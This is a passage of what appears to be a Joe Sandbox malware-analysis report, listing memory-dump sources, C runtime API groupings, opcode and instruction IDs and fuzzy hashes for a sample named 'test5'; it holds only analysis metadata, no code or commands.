                      • Instruction Fuzzy Hash: 6F213E31C25E24FFF3D95B649C693DB6592DBE1310F9505ECE01E871D3DA74894083A0
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd
                      Yara matches
                      Similarity
                      • API ID: free$FreeHeap_errno
                      • String ID:
                      • API String ID: 2737118440-0
                      • Opcode ID: 414a355009f71752a80ca6a1a86f772915b575b7b474327a6fec3fd0861578bf
                      • Instruction ID: 44686d81ee51cb6f7626ef11267a90d5b6b682ba5e8b6ba0cc9871e498a2956a
                      • Opcode Fuzzy Hash: 414a355009f71752a80ca6a1a86f772915b575b7b474327a6fec3fd0861578bf
                      • Instruction Fuzzy Hash: 35412F3C254E1AEFFB94EBA8E8D97FC36D2E7B8315FD4406D9005C2191CA6998458F10
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021553740000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_21553740000_test5.jbxd
                      Yara matches
                      Similarity
                      • API ID: free$_errno
                      • String ID:
                      • API String ID: 2288870239-0
                      • Opcode ID: 414a355009f71752a80ca6a1a86f772915b575b7b474327a6fec3fd0861578bf
                      • Instruction ID: 5c4cf818217c1b868d05c19fc3c83583ce9b60bdbd7cbda43e95ff3e331df49b
                      • Opcode Fuzzy Hash: 414a355009f71752a80ca6a1a86f772915b575b7b474327a6fec3fd0861578bf
                      • Instruction Fuzzy Hash: 73419231635D1ADFFBD8EB98D8987E632D2F7B8315FA04069900DC31A1DA2C8A41C761
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd
                      Yara matches
                      Similarity
                      • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                      • String ID:
                      • API String ID: 1812809483-0
                      • Opcode ID: 2db82fa7e3577a0467f99b3b756d91ff98ac30b20cd2bff14b3452a9952b3022
                      • Instruction ID: 636ada9cdc8658ad08085d866152edbe2f19379cc8bc1e81fd27fcb8cb3c8f08
                      • Opcode Fuzzy Hash: 2db82fa7e3577a0467f99b3b756d91ff98ac30b20cd2bff14b3452a9952b3022
                      • Instruction Fuzzy Hash: 995156340D4E3ADBEB64BB18C4DD3F93BD2EBB4321FD406EAA055C31D5D66688818692
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd
                      Yara matches
                      Similarity
                      • API ID: free$malloc$_errno$_callnewh
                      • String ID:
                      • API String ID: 4160633307-0
                      • Opcode ID: 793386e24770309d8645233254a04ddae00760abb9c1b1c367d4536306e412bf
                      • Instruction ID: 4f3f192bc35051a739f7208a5f4e67e7a7616632f3a37049bd3d7760ab85bb67
                      • Opcode Fuzzy Hash: 793386e24770309d8645233254a04ddae00760abb9c1b1c367d4536306e412bf
                      • Instruction Fuzzy Hash: BA91DA34318F599BE759AA6C94957FD7BD2EBE5710F90029ED48AC3283DE20DC028687
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021553740000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_21553740000_test5.jbxd
                      Yara matches
                      Similarity
                      • API ID: free$malloc$_errno$_callnewh
                      • String ID:
                      • API String ID: 4160633307-0
                      • Opcode ID: 793386e24770309d8645233254a04ddae00760abb9c1b1c367d4536306e412bf
                      • Instruction ID: 476a2afb69b85e4dff711653d2705d84726f8a2f09be62e209235cf02610352e
                      • Opcode Fuzzy Hash: 793386e24770309d8645233254a04ddae00760abb9c1b1c367d4536306e412bf
                      • Instruction Fuzzy Hash: 6691FB30728F199BEB98AA5C94457FA73D2F7E4704F90429DD48EC72C3DE20ED128686
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd
                      Yara matches
                      Similarity
                      • API ID: Packaged__crt_dosmaperr_errno_getptd_noexit_invalid_parameter_noinfo
                      • String ID:
                      • API String ID: 2917016420-0
                      • Opcode ID: 618a4255488f53f113d74fa2bceb050b7581b57bf5715da974d6dc59db4e5fbf
                      • Instruction ID: a9910452156d2d39f5f9069d96bec80b09d83fc7c3d60a1927e8167b26473ccd
                      • Opcode Fuzzy Hash: 618a4255488f53f113d74fa2bceb050b7581b57bf5715da974d6dc59db4e5fbf
                      • Instruction Fuzzy Hash: 6631D538204F199FEB44AB78C8993BD7AD2FBE8310F54459DA04AC32D2DB39D8408B42
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021553740000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_21553740000_test5.jbxd
                      Yara matches
                      Similarity
                      • API ID: Packaged__crt_dosmaperr_errno_getptd_noexit_invalid_parameter_noinfo
                      • String ID:
                      • API String ID: 2917016420-0
                      • Opcode ID: 618a4255488f53f113d74fa2bceb050b7581b57bf5715da974d6dc59db4e5fbf
                      • Instruction ID: 17db524429ac952db9fd1bdbb537e5a59bd04800ab56b437688b32c41a47e420
                      • Opcode Fuzzy Hash: 618a4255488f53f113d74fa2bceb050b7581b57bf5715da974d6dc59db4e5fbf
                      • Instruction Fuzzy Hash: CC31DB30A24E19DFFBD8AF6898593EA72D2FBD8314F54459DA44EC32D1DB38CA418781
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd
                      Yara matches
                      Similarity
                      • API ID: _errno$__doserrno__lock_fhandle_getptd_noexit_unlock_fhandle
                      • String ID:
                      • API String ID: 4120058822-0
                      • Opcode ID: 479da2c5f7565818e68d8e53e938d4df86e4340f370b51f2ddc53d5decdb60f2
                      • Instruction ID: 64bf3956a1821694b1fc4ba361171359487e098c7c0de72394cf1d29052a521f
                      • Opcode Fuzzy Hash: 479da2c5f7565818e68d8e53e938d4df86e4340f370b51f2ddc53d5decdb60f2
                      • Instruction Fuzzy Hash: EF21D8306CCE11EEF314EB68D8E93ED3E92EBE5310F95099CE41A872D2DA695C404A95
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021553740000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_21553740000_test5.jbxd
                      Yara matches
                      Similarity
                      • API ID: _errno$__doserrno__lock_fhandle_getptd_noexit_unlock_fhandle
                      • String ID:
                      • API String ID: 4120058822-0
                      • Opcode ID: 479da2c5f7565818e68d8e53e938d4df86e4340f370b51f2ddc53d5decdb60f2
                      • Instruction ID: de2ed922f92bbb0095581862d65e935a95e905b561430cfd88fc23ba59b42b8c
                      • Opcode Fuzzy Hash: 479da2c5f7565818e68d8e53e938d4df86e4340f370b51f2ddc53d5decdb60f2
                      • Instruction Fuzzy Hash: 99210B31E28E95EEF3945B6C9CE93EF2682EBE4350F8401ECE01EC71D2D6655A408691
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd
                      Yara matches
                      Similarity
                      • API ID: _errno$_filbuf_fileno_getptd_noexit_invalid_parameter_noinfomemcpy_s
                      • String ID:
                      • API String ID: 2328795619-0
                      • Opcode ID: 40b1f2a6e128636b5ea54999467d5c7a08cd77d7087e23116c772b60f44d2d31
                      • Instruction ID: 94911d56badd534912516bc6d625e9e6011782828291eb9566ff8f86ce2a7805
                      • Opcode Fuzzy Hash: 40b1f2a6e128636b5ea54999467d5c7a08cd77d7087e23116c772b60f44d2d31
                      • Instruction Fuzzy Hash: 1461E730258F2596E728563C848E2BD7FD2E7E6720F94039ED056C36D1DA62B8D249C5
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd
                      Yara matches
                      Similarity
                      • API ID: __updatetlocinfo__updatetmbcinfo_errno_getptd_invalid_parameter_noinfo
                      • String ID:
                      • API String ID: 2808835054-0
                      • Opcode ID: 1a3c1f90b9e0765be7a3ca57c2f6cc359d18deb9d03ea8ab1d8e9cb83ec138c3
                      • Instruction ID: 7cfbf7a1798133736c4aa66235733ad1dd3c314e7bb2b3e1426101af500636e7
                      • Opcode Fuzzy Hash: 1a3c1f90b9e0765be7a3ca57c2f6cc359d18deb9d03ea8ab1d8e9cb83ec138c3
                      • Instruction Fuzzy Hash: 9431AF30188E189FDB64DF18D0C97AA7AE2FBA8310F9102E9A40AC76D2DA71DC418785
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd
                      Yara matches
                      Similarity
                      • API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
                      • String ID:
                      • API String ID: 1547050394-0
                      • Opcode ID: e7e64d02c261a324f10eaa55451d76097e548527cea89bdf323e0e266a6b3040
                      • Instruction ID: bc8b5ff3daf069d0db8a12bda15e9ac1e1048250604d7c7dd4c22a1c781b845a
                      • Opcode Fuzzy Hash: e7e64d02c261a324f10eaa55451d76097e548527cea89bdf323e0e266a6b3040
                      • Instruction Fuzzy Hash: EE21C970688E59DFF790AB78C4493AD7FD2FBF9310F8509DAA449C3191EA25DC804B81
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021553740000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_21553740000_test5.jbxd
                      Yara matches
                      Similarity
                      • API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
                      • String ID:
                      • API String ID: 1547050394-0
                      • Opcode ID: 2ee4da16ff171bafb35c0bb8db8b3dd677d1343b8b4ea0f09adf6440b25ff7f8
                      • Instruction ID: 39bc4f3551664db7596cbf9e1c8109b8026844cbe80b43be4b4a7d6308f09950
                      • Opcode Fuzzy Hash: 2ee4da16ff171bafb35c0bb8db8b3dd677d1343b8b4ea0f09adf6440b25ff7f8
                      • Instruction Fuzzy Hash: 4421A730E28F59EFF7D9AB2858093AB76D2EBE8310F4405A9944DC31A2DB64CF4193D1
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd
                      Yara matches
                      Similarity
                      • API ID: free$_errno$_callnewhmalloc
                      • String ID:
                      • API String ID: 2761444284-0
                      • Opcode ID: 5e3b48a2261c00200ba73531dd32d36e90c95496b5af35af7ab5b67e4a0c521d
                      • Instruction ID: 2c27e6e37058aa56f709ed20ffeb9205b8d3a8712460beeeda6bea79e7a81d96
                      • Opcode Fuzzy Hash: 5e3b48a2261c00200ba73531dd32d36e90c95496b5af35af7ab5b67e4a0c521d
                      • Instruction Fuzzy Hash: 5951EA38728F19ABE759DB6C94852F977D1FB99310F90017DD84AC3247EE10EC4286C6
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021553740000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_21553740000_test5.jbxd
                      Yara matches
                      Similarity
                      • API ID: free$_errno$_callnewhmalloc
                      • String ID:
                      • API String ID: 2761444284-0
                      • Opcode ID: 5e3b48a2261c00200ba73531dd32d36e90c95496b5af35af7ab5b67e4a0c521d
                      • Instruction ID: 9062c545b2d7d4f277d2db3d692ee0d725f5291a3d9131ccbb19223460e1544a
                      • Opcode Fuzzy Hash: 5e3b48a2261c00200ba73531dd32d36e90c95496b5af35af7ab5b67e4a0c521d
                      • Instruction Fuzzy Hash: 2351B930728E1A9BFBD99F6894557B773D1FB95300F90016DE44EC3243EA10ED1286C6
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021553740000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_21553740000_test5.jbxd
                      Yara matches
                      Similarity
                      • API ID: malloc$_snprintf$_errnofree$_callnewhrealloc
                      • String ID:
                      • API String ID: 2667508507-0
                      • Opcode ID: 640527ed828b8086bb4541aa1f9c63a5ff0a17add3c1388993af7cef0feedb0d
                      • Instruction ID: 21f69aef45e2f443ce6bb69f5ed179bac9e5e5adb7c31d25f714dc1b2e83ed6e
                      • Opcode Fuzzy Hash: 640527ed828b8086bb4541aa1f9c63a5ff0a17add3c1388993af7cef0feedb0d
                      • Instruction Fuzzy Hash: 27C15630F24E55A7FBD9BB64945A7EB72D3EBE4300F804569A44EC31D3DE349B058682
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd
                      Yara matches
                      Similarity
                      • API ID: _errno$_invalid_parameter_noinfo$fseekmalloc$_callnewh_fseek_nolock_ftelli64fclose
                      • String ID:
                      • API String ID: 2887643383-0
                      • Opcode ID: fedb8edbf5c7940b4ea62b88292aea04c11e351a8cff1d0d25e5b743e65c6225
                      • Instruction ID: cf8ea697652631f2bad97e790e06f7a1f36717c99c360e589144b2bf6e30bec9
                      • Opcode Fuzzy Hash: fedb8edbf5c7940b4ea62b88292aea04c11e351a8cff1d0d25e5b743e65c6225
                      • Instruction Fuzzy Hash: 3E51E731618E189FD348EB38D4997FD76D2E7D8310F8046ADA44BC32D7DE25AD028A81
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021553740000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_21553740000_test5.jbxd
                      Yara matches
                      Similarity
                      • API ID: _errno$_invalid_parameter_noinfo$fseekmalloc$_callnewh_fseek_nolock_ftelli64fclose
                      • String ID:
                      • API String ID: 2887643383-0
                      • Opcode ID: fedb8edbf5c7940b4ea62b88292aea04c11e351a8cff1d0d25e5b743e65c6225
                      • Instruction ID: 651d8d832ff8c47fa0d07a12637fa2aefc9a660421389222c60b4525456c4f83
                      • Opcode Fuzzy Hash: fedb8edbf5c7940b4ea62b88292aea04c11e351a8cff1d0d25e5b743e65c6225
                      • Instruction Fuzzy Hash: BA519C31B28E189FE78DE72894597FA72D2F7D9310F90465DA44FC32D7DE24AA0286C1
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd
                      Yara matches
                      Similarity
                      • API ID: _lock$_calloc_crt_mtinitlocknum
                      • String ID:
                      • API String ID: 3962633935-0
                      • Opcode ID: 2a29bece4ed9085b659b0b9be8632e4f0adfe9a3631b402b8879efea4faa0534
                      • Instruction ID: 12c5670d23fd7fd095da13000ab1d2bb122208f24acbc48d0a9861b75e13414a
                      • Opcode Fuzzy Hash: 2a29bece4ed9085b659b0b9be8632e4f0adfe9a3631b402b8879efea4faa0534
                      • Instruction Fuzzy Hash: 2651F470598E18DBE714DF18C8C93E5BBD2FBA8310F94469DE84AC72A2D775D8428782
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021553740000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_21553740000_test5.jbxd
                      Yara matches
                      Similarity
                      • API ID: _lock$_calloc_crt_mtinitlocknum
                      • String ID:
                      • API String ID: 3962633935-0
                      • Opcode ID: 2a29bece4ed9085b659b0b9be8632e4f0adfe9a3631b402b8879efea4faa0534
                      • Instruction ID: 24efb16a3f57810ab9a5ba02a6a70feca1bcf1218ffbceb17ed25bef7d55d2db
                      • Opcode Fuzzy Hash: 2a29bece4ed9085b659b0b9be8632e4f0adfe9a3631b402b8879efea4faa0534
                      • Instruction Fuzzy Hash: BA512670924E58DBEB949F18C8593A6B3D1FBA4310F9041EDD84EC72A2D774D942CB82
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd
                      Yara matches
                      Similarity
                      • API ID: free$_errno$_callnewhmalloc
                      • String ID:
                      • API String ID: 2761444284-0
                      • Opcode ID: 0defe551ebfe3dd8c80660e702d04152503292365c3874501280693d87aa9fc5
                      • Instruction ID: 9fa8cd3b21fa7baa009f36b0c067c519f2c307f1cce82704d2e7f73beb155ec0
                      • Opcode Fuzzy Hash: 0defe551ebfe3dd8c80660e702d04152503292365c3874501280693d87aa9fc5
                      • Instruction Fuzzy Hash: 6041FA34218F1DABE7589B6C98C92BA3AD6E7E6360F94417DE487C3243EE20D90747C1
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021553740000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_21553740000_test5.jbxd
                      Yara matches
                      Similarity
                      • API ID: free$_errno$_callnewhmalloc
                      • String ID:
                      • API String ID: 2761444284-0
                      • Opcode ID: 0defe551ebfe3dd8c80660e702d04152503292365c3874501280693d87aa9fc5
                      • Instruction ID: 0344842dfcc2a62cc42a144afce85db8aae4f44b31c4f3d43e69898f420b01af
                      • Opcode Fuzzy Hash: 0defe551ebfe3dd8c80660e702d04152503292365c3874501280693d87aa9fc5
                      • Instruction Fuzzy Hash: 6B411931728F1D9BEBA8AA68584A3BB32C6E7E5310F50456DD48FC3253ED20E91747C5
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021553740000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_21553740000_test5.jbxd
                      Yara matches
                      Similarity
                      • API ID: _errno$_invalid_parameter_noinfo$__doserrno_filbuf_filenomemcpy_s
                      • String ID:
                      • API String ID: 1812282339-0
                      • Opcode ID: f984b88899510e62cbe18468345cbbe3864e5a8b2208229d8901ea8d74a4c81d
                      • Instruction ID: 779bd478c25195d094e7ccba73d1ac57824c7738feb89f8de1abce3e988c1e69
                      • Opcode Fuzzy Hash: f984b88899510e62cbe18468345cbbe3864e5a8b2208229d8901ea8d74a4c81d
                      • Instruction Fuzzy Hash: D141B731A38E29DBE6AC562C545D2FA73D3E7F4720FA403AED05EC36D2DA10DA5242C1
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd
                      Yara matches
                      Similarity
                      • API ID: _errno$_fileno_getbuf_getptd_noexit_invalid_parameter_noinfo_isatty
                      • String ID:
                      • API String ID: 304646821-0
                      • Opcode ID: 872796ac68f0a2c990ec7574be4b8262460ebf94b78f5d760dc63ea6db356553
                      • Instruction ID: 8cabe3e0ca31af04a478808a6c3219eafa903ad028d136bac3ebb150f28cee04
                      • Opcode Fuzzy Hash: 872796ac68f0a2c990ec7574be4b8262460ebf94b78f5d760dc63ea6db356553
                      • Instruction Fuzzy Hash: CF51B130194E28DFEB98DF28C4D97EA7AD2FBA8310F9406D9D855CB2D6D676C850C780
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021553740000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_21553740000_test5.jbxd
                      Yara matches
                      Similarity
                      • API ID: _errno$_fileno_getbuf_getptd_noexit_invalid_parameter_noinfo_isatty
                      • String ID:
                      • API String ID: 304646821-0
                      • Opcode ID: 872796ac68f0a2c990ec7574be4b8262460ebf94b78f5d760dc63ea6db356553
                      • Instruction ID: 0dc7066f60ea6f86c51365d671245f708d27ed6dcacdd3e49639e510b2a859da
                      • Opcode Fuzzy Hash: 872796ac68f0a2c990ec7574be4b8262460ebf94b78f5d760dc63ea6db356553
                      • Instruction Fuzzy Hash: C551C030924E28DFEBDC9F28C4997A737D2EBA8310F940599D46ECB2D6D674CA4187D0
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd
                      Yara matches
                      Similarity
                      • API ID: _errno$_snprintffreemalloc$FreeHeap_callnewh_invalid_parameter_noinfo
                      • String ID:
                      • API String ID: 343393124-0
                      • Opcode ID: 6a658e466ab6b8aceff6db9366090ada30c858ea3a03489b9340fb8c77b34acf
                      • Instruction ID: 7c2d2bd455bd7b4f6fc56b9dc9d160788150466f1b451309b5a7a33738757b40
                      • Opcode Fuzzy Hash: 6a658e466ab6b8aceff6db9366090ada30c858ea3a03489b9340fb8c77b34acf
                      • Instruction Fuzzy Hash: C241823071CE585FE699B73CA4593F87BD2E7D9310F944299D0CEC3296DD25AC428B81
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021553740000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_21553740000_test5.jbxd
                      Yara matches
                      Similarity
                      • API ID: _errno$_snprintffreemalloc$_callnewh_invalid_parameter_noinfo
                      • String ID:
                      • API String ID: 761449704-0
                      • Opcode ID: 6a658e466ab6b8aceff6db9366090ada30c858ea3a03489b9340fb8c77b34acf
                      • Instruction ID: 19a67797d0d4d42a93d685f4cbe1fbff66421e9fe9d1af770671d6bac4234f3b
                      • Opcode Fuzzy Hash: 6a658e466ab6b8aceff6db9366090ada30c858ea3a03489b9340fb8c77b34acf
                      • Instruction Fuzzy Hash: BC41B130B1CE585FEA9CAB2C64193F977D2E7D9310F845299D08ED3296DE249E0287C5
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd
                      Yara matches
                      Similarity
                      • API ID: _errno$free$FreeHeap_callnewhfclosefwritemalloc
                      • String ID:
                      • API String ID: 415550720-0
                      • Opcode ID: 7f55edad75ff0bbfcf874ce00c2e3ecc23b72eec22338907bae6ad7bfe5dc563
                      • Instruction ID: e3bc8df0e491ae991211a5e0382c7398e29416b0bffc5c3e7d93574f2214a5be
                      • Opcode Fuzzy Hash: 7f55edad75ff0bbfcf874ce00c2e3ecc23b72eec22338907bae6ad7bfe5dc563
                      • Instruction Fuzzy Hash: 9321A731628E68ABE744F77884983EE76D2F7E8310FD4059DA04AC32C6DD25DD418741
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021553740000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_21553740000_test5.jbxd
                      Yara matches
                      Similarity
                      • API ID: _errno$free$_callnewhfclosefwritemalloc
                      • String ID:
                      • API String ID: 1696598829-0
                      • Opcode ID: 7f55edad75ff0bbfcf874ce00c2e3ecc23b72eec22338907bae6ad7bfe5dc563
                      • Instruction ID: 26f4f23d119e8d64108b044d3c6d8ede71e312a9223d6bb927fa7d4adb1624f0
                      • Opcode Fuzzy Hash: 7f55edad75ff0bbfcf874ce00c2e3ecc23b72eec22338907bae6ad7bfe5dc563
                      • Instruction Fuzzy Hash: B421B730A34E189BE6C8F76854597DB71D2F7E8310F84059DA04ED32C2DD249B014786
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd
                      Yara matches
                      Similarity
                      • API ID: _getptd_noexit$__doserrno_errno
                      • String ID:
                      • API String ID: 2964073243-0
                      • Opcode ID: bd3ba21443fd0c50c0a4bf83960b1fd102cab18f9fc9d7b57dd34df66812a4b6
                      • Instruction ID: 601875d50f14001d480b4ea797438fb6e8e91912f65ecb7da8619c95ca775d2a
                      • Opcode Fuzzy Hash: bd3ba21443fd0c50c0a4bf83960b1fd102cab18f9fc9d7b57dd34df66812a4b6
                      • Instruction Fuzzy Hash: 48018F701D8D25EFE215A768C8A93D83E92EBB1325FD042C8D00AC71D2DB7E18818A52
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021553740000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_21553740000_test5.jbxd
                      Yara matches
                      Similarity
                      • API ID: _getptd_noexit$__doserrno_errno
                      • String ID:
                      • API String ID: 2964073243-0
                      • Opcode ID: bd3ba21443fd0c50c0a4bf83960b1fd102cab18f9fc9d7b57dd34df66812a4b6
                      • Instruction ID: 8d74b7cca462ef9dd2edd194b82586a80dee349c6494a049fbbc3039152c0a03
                      • Opcode Fuzzy Hash: bd3ba21443fd0c50c0a4bf83960b1fd102cab18f9fc9d7b57dd34df66812a4b6
                      • Instruction Fuzzy Hash: B401D630D35E69EFF2E9A72488A97D632D2EBB1365FD442D4D01DCB1E6DB78054082A1
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd
                      Yara matches
                      Similarity
                      • API ID: _errnomalloc$_callnewh$_invalid_parameter_noinfo_snprintf
                      • String ID:
                      • API String ID: 2026495703-0
                      • Opcode ID: 517d69768db3b6bf3d395ac3c09d0a903cb9471390505f3454a2c5542d334632
                      • Instruction ID: ebe6cad037cec19b93b79714efddf4ee00b75b2f3a0428797fa592f1bde6c105
                      • Opcode Fuzzy Hash: 517d69768db3b6bf3d395ac3c09d0a903cb9471390505f3454a2c5542d334632
                      • Instruction Fuzzy Hash: 7F115174A1CF185FE798EB7CA4853A97AD2F79C320F50459EE04AC3296DA34AC414BC5
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021553740000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_21553740000_test5.jbxd
                      Yara matches
                      Similarity
                      • API ID: _errnomalloc$_callnewh$_invalid_parameter_noinfo_snprintf
                      • String ID:
                      • API String ID: 2026495703-0
                      • Opcode ID: 517d69768db3b6bf3d395ac3c09d0a903cb9471390505f3454a2c5542d334632
                      • Instruction ID: 143d83ff2da81fdd97e7d8d0ab3aaeee7798035e589d4b68b2ab23f43d307ed5
                      • Opcode Fuzzy Hash: 517d69768db3b6bf3d395ac3c09d0a903cb9471390505f3454a2c5542d334632
                      • Instruction Fuzzy Hash: A3117F30A2DF155FE798EB68A4493A676D2F798310F50459EE04EC3296EA349A4187C2
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd
                      Yara matches
                      Similarity
